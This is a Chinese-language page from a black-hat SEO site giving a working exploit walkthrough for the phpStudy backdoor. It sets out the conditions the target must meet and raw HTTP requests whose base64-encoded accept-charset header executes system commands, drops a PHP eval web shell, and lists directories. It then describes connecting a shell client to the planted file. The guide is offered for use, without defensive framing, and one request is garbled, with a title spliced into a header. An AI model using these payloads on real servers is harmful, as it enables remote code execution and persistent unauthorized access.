黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

Phpstudy后门漏洞的利用方法之getshell

  请求任意后缀为php的文件

  目标环境为php5.2,5.4,且不能为nts

  存在Accept-Encoding: gzip,deflate

  此处填写base64加密后的payload:accept-charset: c3lzdGVtKCdjYWxjLmV4ZScpOw

  GET /phpinfo.php HTTP/1.1

  Host: 192.168.1.1

  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27

  Sec-Fetch-Mode: navigate

  Sec-Fetch-User: ?1

  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,**;Phpstudy后门漏洞的利用方法之getshellq=0.8,application/signed-exchange;v=b3

  Sec-Fetch-Site: none,

  accept-charset: c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=Accept-Encoding: gzip,deflate

  Accept-Language: zh-CN,zh;q=0.9

  phpstudy后门利用方法及getshell(图3)

  利用phpstudy的后门实现无文件落地蚁剑getshell,但有时会不成功,设置完毕后连接即可

  phpstudy后门利用方法及getshell(图4)

  phpstudy后门利用方法及getshell(图5)

  phpstudy后门利用方法及getshell(图6)

  若无法成功连接,可能生成目录不对,执行命令tree /f查看文件树,找到可访问路径生成shell

  GET /phpinfo.php HTTP/1.1

  Host: 192.168.1.1

  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Edg/77.0.235.27

  Sec-Fetch-Mode: navigate

  Sec-Fetch-User: ?1

  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

  Sec-Fetch-Site: none,

  accept-charset: c3lzdGVtKCd0cmVlIC9mJyk7

  Accept-Encoding: gzip,deflate

  Accept-Language: zh-CN,zh;q=0.9

  phpstudy后门利用方法及getshell(图7)

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » Phpstudy后门漏洞的利用方法之getshell
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜